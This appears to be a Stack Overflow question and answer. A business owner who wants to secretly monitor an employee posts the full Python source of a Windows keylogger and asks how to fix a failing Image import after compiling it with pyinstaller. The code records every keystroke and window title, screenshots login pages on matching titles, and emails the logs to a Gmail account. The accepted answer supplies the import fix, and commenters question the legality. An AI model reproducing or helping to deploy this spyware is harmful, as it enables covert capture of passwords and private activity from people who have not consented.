# Image Module error

Tags: python, django

It has been a while I had this problem now. I have a small business and I want to keep an eye on one of my employee. I thought best way will be a keylogger in my work-space network of computers. So I got this python keylogger for my self (link below). It had added support for Screenshots using the Image module. When i edited it for my needs and tried to compile with pyinstaller using

`pyinstaller --onefile mylogger.py`

It compiled as I thought it would but with a few warnings. But when I tried to run it it showed that the 'Image' module was missing. However I had downloaded it with the pip command `pip install image`. So basically that command downloaded 3 modules they were - Pillow, Django & Image which were all saved in `C:\python27\lib\site-packages`. I uninstalled Image and downloaded it again. This time I even Validated it by first typing `python` and then issuing the following command `import Image` and it worked fine and returned with no errors. I then again compiled it but with pyinstaller but I again had the same wretched luck. The code for the keylogger is here

```
   #!/usr/bin/python

   # Automated Keylogger 0.1a #
   # ------------------------ #
   # > www.TechnicDynamic.com #
   # ------------------------ #

   # Credits to original code from DaniWeb forums:
   # http://www.daniweb.com/software-                     development/python/threads/229564/python-keylogger

   # Currently works on Windows only
   # -------------------------------
   # * Records all keystrokes
   # * Takes automated screenshots (see config below)
   # * Sends email containing logs and screenshots


   # Required modules
   # ----------------
   # Make sure they're all installed if you plan to compile it yourself.

   from threading import Timer
   from threading import Thread
   from email.mime.text import MIMEText
   from email.mime.image import MIMEImage
   from email.mime.multipart import MIMEMultipart
   import subprocess, socket, base64, time, datetime, os, sys, urllib2,                              platform
   import pythoncom, pyHook, Image, ImageGrab, win32api, win32gui, win32con,        smtplib

   # Keylogger settings
   #################################
   # Email Settings             #
   LOG_SENDMAIL = False         # set to True to send emails
   LOG_MAIL = 'email@gmail.com'     # account email address (must exist)
   LOG_PASS = 'password'            # email's password (must exist)
   LOG_FROM = 'bla@blabla.com'      # email will be sent from this address        
   LOG_SUBJ = 'Long time my friend'# email subject
   LOG_MSG = 'Howdy!'               # email content - the body
   # ----------------------------- #
   # Screenshot Settings            #
   LOG_SCREENSHOT = False           # set to True to take screenshot(s)
   LOG_SCREENSNUM = 3               # set amount of screenshot to take.
   LOG_INTERVAL = 2             # interval between each screenshot.
   LOG_SCREEN = []                  # this list contains matches for taking                             automated screenshots...
   #LOG_SCREEN.append("Facebook")   # for example, if it finds "Facebook" in        titlebar..
   #LOG_SCREEN.append("Sign In")    # or if it finds "Sign In", common email        login page.
   #LOG_SCREEN.append("Google")     # -- 'watchu googlin fool?
   # ----------------------------- #
   # System Settings                # [shouldn't be modified]
   LOG_FILENAME = 'tmpConf.txt' # log file (current directory)
   LOG_TOSEND = []                  # contains files to send in email        attachment
   LOG_ACTIVE = ''                  # stores active window
   LOG_STATE = False                # Start keylogger as false
   LOG_TIME = 0                 # amount of time to log in seconds, where 0 = infinite and 86400 = 1 day
   LOG_TEXT = ""                    # this is the raw log var which will be                      written to file
   LOG_TEXTSIZE = 0             # marks the beginning and end of new text               blocks that separate logs
   LOG_MINTERVAL = 86400            # main loop intervals in seconds, where 86400 = 1 day (default)
   LOG_THREAD_kl = 0                # thread count for keylogger
   LOG_THREAD_ss = 0                # thread count for automated screenshots
   # ----------------------------- #
   # Debug [Don't change]           #
   # LOG_ITERATE = 3                #
   # print os.getcwd()              #
   #################################

   # this sets the thread ID before execution.
   main_thread_id = win32api.GetCurrentThreadId()

   def Keylog(k, LOG_TIME, LOG_FILENAME):
       # only supported for Windows at the moment...
       if os.name != 'nt': return "Not supported for this operating system.\n"
       global LOG_TEXT, LOG_FILE, LOG_STATE, LOG_ACTIVE, main_thread_id
       LOG_STATE = True # begin logging!
       main_thread_id = win32api.GetCurrentThreadId()
       # add timestamp when it starts...
       LOG_TEXT += "\n===================================================\n"
       LOG_DATE = datetime.datetime.now()
       LOG_TEXT += ' ' + str(LOG_DATE) + ' >>> Logging started.. |\n'
       LOG_TEXT += "===================================================\n\n"
       # find out which window is currently active!
       w = win32gui
       LOG_ACTIVE = w.GetWindowText (w.GetForegroundWindow())
       LOG_DATE = datetime.datetime.now()
       LOG_TEXT += "[*] Window activated. [" + str(LOG_DATE) + "] \n"
       LOG_TEXT += "=" * len(LOG_ACTIVE) + "===\n"
       LOG_TEXT += " " + LOG_ACTIVE + " |\n"
       LOG_TEXT += "=" * len(LOG_ACTIVE) + "===\n\n"
       if LOG_TIME > 0:
           t = Timer(LOG_TIME, stopKeylog) # Quit
           t.start()
       # open file to write
       LOG_FILE = open(LOG_FILENAME, 'w')
       LOG_FILE.write(LOG_TEXT)
LOG_FILE.close()
       hm = pyHook.HookManager()
       hm.KeyDown = OnKeyboardEvent
       hm.HookKeyboard()
       pythoncom.PumpMessages() # this is where all the magic happens! ;)
       # after finished, we add the timestamps at the end.
       LOG_FILE = open(LOG_FILENAME, 'a')
       LOG_TEXT +=        "\n\n===================================================\n"
       LOG_DATE = datetime.datetime.now()
       LOG_TEXT += " " + str(LOG_DATE) + ' >>> Logging finished. |\n'
       LOG_TEXT += "===================================================\n"
       LOG_STATE = False
       try: 
           LOG_FILE.write(LOG_TEXT)
           LOG_FILE.close()
       except:
           LOG_FILE.close()
       return True

   # this function stops the keylogger...
   # thank God for the StackOverflow thread! :D
   def stopKeylog():
       win32api.PostThreadMessage(main_thread_id, win32con.WM_QUIT, 0, 0);

   # this function actually records the strokes...
   def OnKeyboardEvent(event):
              global LOG_STATE, LOG_THREAD_ss
              # return if it isn't logging.
       if LOG_STATE == False: return True
       global LOG_TEXT, LOG_FILE, LOG_FILENAME, LOG_ACTIVE, LOG_INTERVAL,                      LOG_SCREENSHOT, LOG_SCREENSNUM
       LOG_TEXT = ""
       LOG_FILE = open(LOG_FILENAME, 'a')
       # check for new window activation
       wg = win32gui
       LOG_NEWACTIVE = wg.GetWindowText (wg.GetForegroundWindow())
       if LOG_NEWACTIVE != LOG_ACTIVE:
           # record it down nicely...
           LOG_DATE = datetime.datetime.now()
           LOG_TEXT += "\n\n[*] Window activated. [" + str(LOG_DATE) + "] \n"
           LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n"
           LOG_TEXT += " " + LOG_NEWACTIVE + " |\n"
           LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n\n"
           LOG_ACTIVE = LOG_NEWACTIVE
           # take screenshots while logging!
           if LOG_SCREENSHOT == True:
               LOG_IMG = 0
               while LOG_IMG < len(LOG_SCREEN):
                   if LOG_NEWACTIVE.find(LOG_SCREEN[LOG_IMG]) > 0:
                       LOG_TEXT += "[*] Taking " + str(LOG_SCREENSNUM) + "        screenshot for \"" + LOG_SCREEN[LOG_IMG] + "\" match.\n"
                       LOG_TEXT += "[*] Timestamp: " + str(datetime.datetime.now()) + "\n\n"
                       ss = Thread(target=takeScreenshots, args=       (LOG_THREAD_ss,LOG_SCREENSNUM,LOG_INTERVAL))
                       ss.start()
                       LOG_THREAD_ss += 1 # add 1 to the thread counter
                   LOG_IMG += 1
           LOG_FILE.write(LOG_TEXT)

       LOG_TEXT = ""    
       if event.Ascii == 8: LOG_TEXT += "\b"
       elif event.Ascii == 13 or event.Ascii == 9: LOG_TEXT += "\n"
       else: LOG_TEXT += str(chr(event.Ascii))
       # write to file
       LOG_FILE.write(LOG_TEXT) 
       LOG_FILE.close()

       return True

   # screenshot function
          def Screenshot():
       img=ImageGrab.grab()
       saveas=os.path.join(time.strftime('%Y_%m_%d_%H_%M_%S')+'.png')
       img.save(saveas)
       if LOG_SENDMAIL == True:
           addFile = str(os.getcwd()) + "\\" + str(saveas)
           LOG_TOSEND.append(addFile) # add to the list

   # take multiple screenshots function
   # args = number of shots, interval between shots
   def takeScreenshots(i, maxShots, intShots):
       shot = 0
       while shot < maxShots:
           shottime = time.strftime('%Y_%m_%d_%H_%M_%S')
           Screenshot()
           time.sleep(intShots)
           shot += 1


   # send email function
   # this example is for GMAIL, if you use a different server
   # you MUST change the line below to the server/port needed
   # server = smtplib.SMTP('smtp.gmail.com:587')
   def sendEmail():
       msg = MIMEMultipart()
       msg['Subject'] = LOG_SUBJ
       msg['From'] = LOG_FROM
       msg['To'] = LOG_MAIL
       msg.preamble = LOG_MSG
       # attach each file in LOG_TOSEND list  
       for file in LOG_TOSEND:
           # attach text file
           if file[-4:] == '.txt':
               fp = open(file)
               attach = MIMEText(fp.read())
               fp.close()
           # attach images
           elif file[-4:] == '.png':
               fp = open(file, 'rb')
               attach = MIMEImage(fp.read())
               fp.close()
           attach.add_header('Content-Disposition', 'attachment;        filename="%s"' % os.path.basename(file))
           msg.attach(attach)

       server = smtplib.SMTP('smtp.gmail.com:587')
       server.starttls()  
       server.login(LOG_MAIL, LOG_PASS)
       server.sendmail(LOG_FROM, LOG_MAIL, msg.as_string())  
       server.quit()

   # function to clean up fiels
   def deleteFiles():
       if len(LOG_TOSEND) < 1: return True
       for file in LOG_TOSEND:
           os.unlink(file)


   #        begin keylogging
   kl        = Thread(target=Keylog, args=(LOG_THREAD_kl,LOG_TIME,LOG_FILENAME))
   kl       .start()

   #        if keylogging is running infinitely
   if        LOG_TIME < 1:
       # begin continuous loop
       while True:

           # zZzzzzZZzzZ
           time.sleep(LOG_MINTERVAL) # sleep for time specified

           LOG_NEWFILE = time.strftime('%Y_%m_%d_%H_%M_%S') + ".txt"
           # add file to the LOG_TOSEND list
           if LOG_SENDMAIL == True:
               addFile = str(os.getcwd()) + "\\" + str(LOG_NEWFILE)
               LOG_TOSEND.append(addFile) # add to the list

           LOG_SAVEFILE = open(LOG_NEWFILE, 'w')
           LOG_CHCKSIZE = open(LOG_FILENAME, 'r')
           LOG_SAVEFILE.write(LOG_CHCKSIZE.read())
           LOG_CHCKSIZE.close()
           try:
               LOG_SAVEFILE.write(LOG_SAVETEXT)
               LOG_SAVEFILE.close()
           except:
               LOG_SAVEFILE.close()

           # send email
           if LOG_SENDMAIL == True:
               sendEmail()
               time.sleep(6)
               deleteFiles()
           LOG_TOSEND = [] # clear this list


   # otherwise sleep for specified time, then break program
   elif LOG_TIME > 0:
       # sleep for time specified
       time.sleep(LOG_TIME)
       time.sleep(2)
       # check to send email
       if LOG_SENDMAIL == True:
           addFile = str(os.getcwd()) + "\\" + str(LOG_FILENAME)
           LOG_TOSEND.append(addFile) # add to the list
           sendEmail()
       time.sleep(2)

   sys.exit()
```

Am I missing somthing? Or is the code wrong? Plz Guide me. Changing to another keylogger is not an option

P.S> I know there are threads about the problem but none answer my problem

Regards & Cheers

*Thanks to all Who supported and help me solve the question, however this question has been answered now.*

Comment: You haven't told us what the problem actually is. (I'm also not sure if what you're doing is legal but thats against the point)

Comment: As Sayse said, it's probably illegal (unless you tell your employees you've installed a keylogger). I think you should let them do what they want, provided they do their work properly and in time. I know it's off topic but this kind of stuff annoys me so I commented anyway. Sorry.

Comment: I am happy for all your responsible points but I myself do not think that installing a keylogger in MY OWN workspace and MY OWN bought computer  is illegal. I just want to make sure that my property is not being used for other than what i permit. That's what keyloggers are for you know to keep track of your property and see if somone is misusing it.My problem is that after even I downloaded the Image module the script says it is missing. This was out of my league so I asked my question in this wonderful site

Comment: You might want to include the stack trace you're receiving in your question.

Comment: Stack Trace? Sorry i am new to python i do not understand much.

Comment: "But when I tried to run it it showed that the 'Image' module was missing." The [stack trace or traceback](https://en.wikipedia.org/wiki/Stack_trace) is the full error message you received. You can edit your question and add paste in your stack trace.

Answer (score 1, accepted):

Since you use Pillow, you have to change the Image and ImageGrab imports.

```
from PIL import Image, ImageGrab
```

> Pillow is a functional drop-in replacement for the Python Imaging
>   Library. To run your existing PIL-compatible code with Pillow, it
>   needs to be modified to import the Image module from the PIL namespace
>   instead of the global namespace

http://pillow.readthedocs.org/en/3.0.x/porting.html

The [image](https://pypi.python.org/pypi/image) package you installed is not the module you are looking for (note the lowercase "i"). And there's no need to install django, either.

Comment: Thanks Lid, I got it working. It is so extra-oridinary that anwsers to such complicated questions can be 1 line and so ordinary. This clearly shows that nothing is impossible. But I have one more question, what if I start multiple instances ? Should the application crash ? If so is it possible to change that and do not allow a second instance to start?

Comment: No problem. To show that this problem is solved, you can mark my answer as accepted. As to whether it's possible to run multiple instances, I have no idea. You can post a new question about that. And include any error messages that you get when the program crashes.

Comment: Ok thanks ,and offcourse i was going to green check it;)